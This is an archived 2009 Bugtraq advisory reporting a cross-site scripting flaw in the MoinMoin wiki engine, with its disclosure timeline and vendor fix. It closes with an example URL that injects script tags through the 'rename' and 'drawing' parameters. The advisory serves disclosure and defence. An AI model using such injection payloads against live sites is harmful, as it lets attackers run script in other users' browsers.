[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
MoinMoin Wiki Engine XSS Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: MoinMoin Wiki Engine XSS Vulnerability
- From: swhite@xxxxxxxxxxxxxxx
- Date: Tue, 20 Jan 2009 09:25:32 -0700
MoinMoin Wiki Engine Cross-Site Scripting
Discovered by: SecureState R&D Team (sasquatch)
Website: www.securestate.com
Discovered: 01-08-09
Vendor Notified: 01-08-09
Vendor Fix Issued: 01-11-09 (http://hg.moinmo.in/moin/1.8/rev/8cb4d34ccbc1)
Vendor Fix: Upgrade to version 1.8.1
Public Posting: 01-19-09
Example:
http://moinmo.in/moinmoin/WikiSandBox?rename="><script>alert('rename
xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script>